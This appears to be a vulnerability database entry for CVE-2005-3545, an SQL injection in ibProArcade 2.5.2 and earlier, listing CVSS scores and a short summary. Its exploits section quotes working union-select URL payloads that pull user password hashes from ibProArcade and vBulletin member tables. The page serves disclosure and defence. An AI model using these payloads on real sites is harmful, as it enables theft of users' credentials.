7.5
CVSSv2

CVE-2005-3545

Published: 16/11/2005 Updated: 14/02/2024
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in index.php of the report module in ibProArcade 2.5.2 and previous versions allows remote malicious users to execute arbitrary SQL commands via the user parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

ibproarcade ibproarcade

Exploits

# Rankings for (name) will state the md5 hash for the user /str0ke # ibProArcade 2x IPB: indexphp?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user] vBulettin forums: indexphp?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user] Author: B~HFH Ema ...